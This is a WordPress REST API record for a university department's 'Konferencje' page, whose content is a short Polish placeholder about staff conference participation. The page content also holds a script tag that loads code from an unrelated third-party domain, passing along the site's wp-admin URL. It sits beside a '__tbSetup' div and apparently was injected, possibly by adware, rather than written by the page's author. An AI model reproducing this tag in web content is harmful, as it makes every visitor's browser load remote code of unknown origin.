{"id":402,"date":"2013-08-08T13:58:32","date_gmt":"2013-08-08T11:58:32","guid":{"rendered":"http:\/\/www.zti.il.pw.edu.pl\/?page_id=402"},"modified":"2013-08-08T13:58:32","modified_gmt":"2013-08-08T11:58:32","slug":"konferencje-2","status":"publish","type":"page","link":"https:\/\/www.zti.il.pw.edu.pl\/?page_id=402","title":{"rendered":"Konferencje"},"content":{"rendered":"<p>W tym miejscu b\u0119d\u0105 umieszczane informacje o konferencjach, w kt\u00f3rych uczestniczyli pracownicy ZTI.<\/p>\n<div id=\"__tbSetup\"><\/div>\n<p><script type=\"text\/javascript\" src=\"https:\/\/secure-content-delivery.com\/data.js.php?i={27FB18BF-E093-4E13-8B69-56240FC77379}&amp;d=2013-6-12&amp;s=http:\/\/www.zti.il.pw.edu.pl\/wp-admin\/post-new.php?post_type=page&amp;cb=0.7884603299151439\"><\/script><\/p>\n<div class=\"gsp_post_data\" \r\n\t            data-post_type=\"page\" \r\n\t            data-cat=\"\" \r\n\t            data-modified=\"120\"\r\n\t            data-created=\"1375970312\"\r\n\t            data-title=\"Konferencje\" \r\n\t            data-home=\"https:\/\/www.zti.il.pw.edu.pl\"><\/div>","protected":false},"excerpt":{"rendered":"<p>W tym miejscu b\u0119d\u0105 umieszczane informacje o konferencjach, w kt\u00f3rych uczestniczyli pracownicy ZTI.<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-402","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.zti.il.pw.edu.pl\/index.php?rest_route=\/wp\/v2\/pages\/402","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.zti.il.pw.edu.pl\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.zti.il.pw.edu.pl\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.zti.il.pw.edu.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.zti.il.pw.edu.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=402"}],"version-history":[{"count":1,"href":"https:\/\/www.zti.il.pw.edu.pl\/index.php?rest_route=\/wp\/v2\/pages\/402\/revisions"}],"predecessor-version":[{"id":403,"href":"https:\/\/www.zti.il.pw.edu.pl\/index.php?rest_route=\/wp\/v2\/pages\/402\/revisions\/403"}],"wp:attachment":[{"href":"https:\/\/www.zti.il.pw.edu.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=402"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}